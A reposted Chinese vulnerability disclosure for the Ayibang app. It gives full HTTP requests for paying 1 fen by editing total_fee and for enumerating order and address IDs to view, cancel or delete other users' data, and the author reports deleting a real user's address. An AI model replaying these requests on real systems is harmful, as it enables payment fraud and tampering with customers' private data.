【漏洞学习——支付漏洞】阿姨帮最新版APP支付漏洞+地址/订单遍历/删除

最新推荐文章于 2024-04-03 12:01:58 发布
最新推荐文章于 2024-04-03 12:01:58 发布
阅读量1.1k 收藏 7
点赞数 1
分类专栏: 【渗透测试实战】 # 乌云漏洞案例学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/84646860
版权

漏洞细节

1、超低价格支付订单
点击首页,随便选择一项服务并下订单

点击确认支付抓包并先截断提交:

POST https://api-cust.ayibang.com/v1/pay/wx/sign HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 30f6188161eb1a0bc7d245c49c01a208bb3cee34
Network: WiFi
City: beijing
Timestamp: 1452845167007
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: api-cust.ayibang.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 128
out_trade_no=11291191&attach=0_1_13800000000_0&body=%E9%98%BF%E5%A7%A8%E5%B8%AE%E6%94%AF%E4%BB%98&total_fee=5000&trade_type=APP&

将上面的total_fee的值改为1,提交


支付成功后订单成为待确认状态,说明支付成功

2、任意用户订单查看
点击我们刚生成的订单,系统访问如下地址:

GET https://api-cust.ayibang.com/v1/order/detail?orderID=11291191 HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 30f6188161eb1a0bc7d245c49c01a208bb3cee34
Network: WiFi
City: beijing
Timestamp: 1452845324989
Host: api-cust.ayibang.com
Connection: Keep-Alive
Accept-Encoding: gzip

orderID=11291191处可遍历,burp出手对订单的后四位遍历

N多订单信息可看

以订单ID为11290071为例,可查看到该订单涉及用户的姓名 手机号 住址等

3、任意用户订单取消漏洞
点击之前的订单,点击取消订单,系统访问如下url:

POST https://api-cust.ayibang.com/v1/order/cancel HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 30f6188161eb1a0bc7d245c49c01a208bb3cee34
Network: WiFi
City: beijing
Timestamp: 1452846770206
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: api-cust.ayibang.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 42
data=%7B%22orderID%22%3A%2211291191%22%7D&

post处内容url解码后为:{"orderID":"11291191"}
通过遍历orderID可删除所有订单
通过另一手机注册一个账号并下一个订单

抓包查得该订单ID为11292401
提交以下代码:

POST https://api-cust.ayibang.com/v1/order/cancel HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 30f6188161eb1a0bc7d245c49c01a208bb3cee34
Network: WiFi
City: beijing
Timestamp: 1452846770206
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: api-cust.ayibang.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 42
data=%7B%22orderID%22%3A%2211292401%22%7D&

成功取消该订单

再查看该用户订单列表,已经成为空:

4、任意用户服务地址删除
点击app里面服务地址:

添加两个地址:

然后删除上面的两个地址,并抓包:
删除第一个地址请求数据包如下:

GET https://api-cust.ayibang.com/v1/house/delete?houseID=17334752 HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 211ebac721824b5cb688e3c6d1187bc21beff557
Network: WiFi
City: nanjing
Timestamp: 1452841496773
Host: api-cust.ayibang.com
Connection: Keep-Alive
Accept-Encoding: gzip

返回数据包如下:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Jan 2016 07:04:57 GMT
Content-Type: application/json
Connection: close
X-Powered-By: PHP/5.6.11
Content-Length: 628
{"house":{"id":"17334752","custID":"16989352","city":"nanjing","cityName":"\u5357\u4eac","zone":"null","nameAddr":"\u5b9e\u9a8c\u6d4b\u8bd5\u4e2d\u5fc3","svcAddr":"\u6c5f\u82cf\u7701\u5357\u4eac\u5e02\u4e2d\u5c71\u4e1c\u8def534\u53f7","detailAddr":"\u6d4b\u8bd5\u5730\u5740","sqmeter":0,"status":-1,"bedroom":0,"livingroom":0,"kitchen":0,"bathroom":0,"remark":"","comment":"","defaultaddr":1,"oid":"0","type":"1","locationAddr":"\u5b9e\u9a8c\u6d4b\u8bd5\u4e2d\u5fc3\u6d4b\u8bd5\u5730\u5740","addr":"\u5357\u4eac\u5b9e\u9a8c\u6d4b\u8bd5\u4e2d\u5fc3\u6d4b\u8bd5\u5730\u5740","statusName":"\u5df2\u5220\u9664","durationSuggest":2}}

上面内容解码后如下:

可以看到statusName处标记为已删除,并且数据包返回的ID与删除的ID为同一ID:17334752
再删除另外一个地址:

GET https://api-cust.ayibang.com/v1/house/delete?houseID=17336562 HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 211ebac721824b5cb688e3c6d1187bc21beff557
Network: WiFi
City: nanjing
Timestamp: 1452841783577
Host: api-cust.ayibang.com
Connection: Keep-Alive
Accept-Encoding: gzip

由此可看到系统删除服务地址是根据不同的ID来实现的,虽然数字不是连续的,但是经过几次尝试发现都是以17开头的8位数字,如此遍可以通过遍历id删除其它用户的服务地址
只需提交以下数据包:

GET https://api-cust.ayibang.com/v1/house/delete?houseID=17336562 HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 211ebac721824b5cb688e3c6d1187bc21beff557

通过burpsuite 遍历houseID处,即可删除所有用户收获地址
以下为我随便找的一个用户地址(抱歉给这位用户带来困扰):

GET https://api-cust.ayibang.com/v1/house/delete?houseID=17330512 HTTP/1.1
Host: api-cust.ayibang.com
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36 OPR/34.0.2036.47
DNT: 1
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: zh-CN,zh;q=0.8

返回:

如果需要通过浏览器复现上面问题,需要注意数据请求处有一个请求头:
Authorization: 211ebac721824b5cb688e3c6d1187bc21beff557
此处的authorization是用户在登录APP的时候服务器返回的认证key

参见:https://bugs.shuimugan.com/bug/view?bug_no=174347

 

FLy_鹏程万里
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【懒人】窗口遍历工具
08-24
可以遍历系统窗口,并遍历某主窗口下所有子窗口,支持搜索功能,可以方便查看窗口结构便于进行脚本制作。 另外,程序还加入了测试窗口的后台按钮点击及后台发送字符串的功能,方便测试后台执行。
支付漏洞
净邪的博客
06-25 580
实操:(没有前后端验证的cms) 先注册一个账号; 打开商品中心 报错了不管它,然后去到在线充值就可以看到flag了 修改支付的价格(https://www.uedbox.com/post/22477/) §支付三步曲——订购、订单、付款 •三个步骤当中的随便一个步骤进行修改价格测试,如果前面两步有验证机制,那么你可在最后一步付款时进行抓包尝试修改金额,如果没有在最后一步做好检验,那么问题就会存在,其修改的金额值你可...
干货 | 这套网站漏洞挖掘(渗透)思路,看完能快速上手
weixin_59191169的博客
04-03 639
本篇主要分享网站各漏洞思路,希望你看完有所收获。
阿姨的android+代码,阿姨最新APP漏洞大全(支付漏洞/地址/订单遍历/删除等)...
weixin_29765215的博客
05-26 875
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?危害:看文章自己脑补漏洞等级:高提交时间: 2016-02-02 12:45简要描述:阿姨最新版APP(v6.2.0)漏洞打包详细说明:支付漏洞1. 超低价格支付订单点击首页,随便选择一项服务并下订单2. 点击确认支付抓包并先截断提交:123456789101112POST https://api-cust.ayi...
微信支付安全漏洞
CSDN新星计划JAVA赛道TOP5、CSDN内容合伙人、JAVA领域优质创作者、资深JAVA开发深耕JAVA领域。
07-04 1099
7月1日,在老牌漏洞披露平台Full Disclosure出现了一封写给微信支付的公开信。发件人是Rose Jackcode,信的标题是《微信支付官方SDK的XXE安全漏洞(微信支付在商户页面遗留了一个后门)》。发表在漏洞披露平台Full Disclosure上的公开信 发件人Rose Jackcode在信中称,他在微信支付官方SDK(软件工具开发包)发现了一个安全漏洞,此漏洞可导致商家服务器被入...
src漏洞挖掘-逻辑漏洞-用户订单修改
qq_47604261的博客
11-09 3299
src漏洞挖掘 本人web小白 文章技术含量不会很高 注册了两个账号 测试业务 发现了支付页面,可以测试能不能修改,其中我发现了几个参数 我猜第二个参数是用户id 那我就可以修改用户id达到修改订单的目的 第三个是套餐的id (经过测试) 实验的方法是在注册一个号 把第二个的id 给第一个号 替换 订单跑到第二个号里了 ...
AppMsg:一款适用于以APP病毒分析 APP漏洞挖掘 辅助分析工具-漏洞挖掘
最新发布
04-23
一款适用于以APP病毒分析、APP漏洞挖掘、APP开发、HW行动/红队/渗透测试团队为场景的移动端(Android、iOS)辅助分析工具,可以APP开发工程师、病毒分析师、漏洞/安全研究员提高工作效率,助渗透测试工程师、...
PHP源/码支付Ver3.1版+APP开源版源码
05-03
​PHP7.2 Mysql5.6 Supervisor管理器 Redis 1.新建一个网站,解压,环境选择PHP7.2 网站运行目录... 2.安装完网站后打开终端,执行以下命令 sudo rpm -Uvh sudo yum install dotnet-sdk- 完整介绍放到压缩包了。
APPPAY个人免签支付系统/微信免签支付码/支付系统源码.rar
07-03
APPPAY个人免签支付系统/微信免签支付码/支付系统源码.rar
2022最新版个人免签码支付源码+带监控APP【亲测】
04-22
1、宝塔面板中新建网站安装环境需要设置: ...+ 网站目录->运行目录 设置为public并保存 + 伪静态 设置为thinkphp并保存 ... ... 3、导入数据库文件。...上传二维码之后下载APP监控 需要登录微信和支付宝才能监控
2022最新仿源支付3.1版本全开源版+店员监控软件+手机监控APP源码
04-16
...2.安装完网站后打开终端,执行以下命令 ...sudo yum install dotnet-sdk-3.1 遇到需要输入的时候全部输入y 3.安装完毕,打开搭建的网站,打开CloudAPI文件找到appssettings.json,将里面的数据库信息...仅供研究学习使用!
支付漏洞之总结
mingyqf的博客
04-13 949
转自:https://www.secpulse.com/archives/67080.html 挖洞技巧:支付漏洞之总结 本文作者:HtM 大家好,我是剑影,这是我的第四篇原创文章。 我写文章向来是尽可能的把各种思路写在一起,而不是分散着些,所以我在网上收集了个人认为不错的思路以及自己在挖掘过程中的思路,然后融入到本文章当中,争取让大家能够学到这方面更多的知识和思路。 我写文章就是带着耳机,循环放着自己喜欢的歌单,翻阅各种历史文章,然后一边写一边思考,写完了然后总体检阅一遍。在我想构思第四篇应该写什么的
(34.2)【支付漏洞专题】漏洞原理、产生、环境、篡改数据过程、漏洞利用……
04-13 3477
【专题】支付漏洞从0到1
订单遍历非递归
IT与开发人员的地盘
05-20 75
介绍 ------------- 在从根开始的二叉树中,总有一条到达任何节点的路径,但是对于任何特定节点,该路径都是唯一的,这些路径中的每一个都可以扩展到某个叶节点。 因此,如果我们覆盖所有路径一次直到叶子节点,那么我们覆盖一次所有节点。 因此,要遍历所有节点,如果我们从根开始遍历每个叶节点,我们将遍历树中的每个节点。 对于后订单,以下是非递归算法。 算法 --------...
【网络安全】实操XSS订单系统漏洞(利用盲打)
你在看屏幕的同时,屏幕也在注视着你
09-07 4146
xss订单靶场实战
在线支付逻辑漏洞总结
weixin_33712881的博客
03-08 4046
瞌睡龙 · 2013/07/19 19:110x00 背景介绍随着网民越来越习惯于网上购物,出现了越来越多的电商网站,在线交易平台等。其中肯定要涉及在线支付的流程,而这里面也有很多逻辑。由于这里涉及到金钱,如果设计不当,很有可能造成0元购买商品等很严重的漏洞。0x01 检测方法与案例根据乌云上的案例,支付漏洞一般可以分为五类,如果发现其他的类型,欢迎补充:1、支付过程中可直接修改数据包中的支付金额...
网站安全测试之支付漏洞检测与修复
weixin_34236497的博客
05-31 1329
前几篇的网站安全检测的文章,介绍的都是跟验证码以及用户逻辑功能方面的安全测试与防攻击方法,今天给大家深度的来剖析一下关于网站里含有支付接口的安全漏洞。许多商城网站,以及微信支付网站,在线游戏平台,发卡商,棋牌等网站都含有支付功能,支付安全是整个网站中,安全占比较高的,支付安全出了问题,带来的可是无法估量的损失。 支付接口的安全漏洞 经常...
订单操作
搬砖的孟达的博客
10-10 696
在项目遇到 订单操作 ;订单操作会衍生好多其他的操作 比如说订单项操作 发货操作 售后操作...当进行这些操作的时候应该仔细梳理 逻辑关系;操作过程中应该按照逻辑关系进行依次操作,在订单的相关的操作 完成后 最后对订单状态进行修改...这样更加符合逻辑.
漏洞之目录遍历漏洞
angry_program的博客
01-10 2360
目录遍历漏洞 目录遍历, 也叫路径遍历,由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件 (可以是web根目录以外的文件),甚至可以执行系统命令。 原理 程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。...
原生app的淘宝客+代理系统/完整前后端/带完整安装教程
01-03
原生app的淘宝客代理系统是一个完整的前后端系统,可以让用户快速搭建自己的淘宝客推广平台。该系统包括了完整的功能模块,如商品推广、订单跟踪、佣金结算等,能够助用户快速实现自己的电商推广业务。 首先,该...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值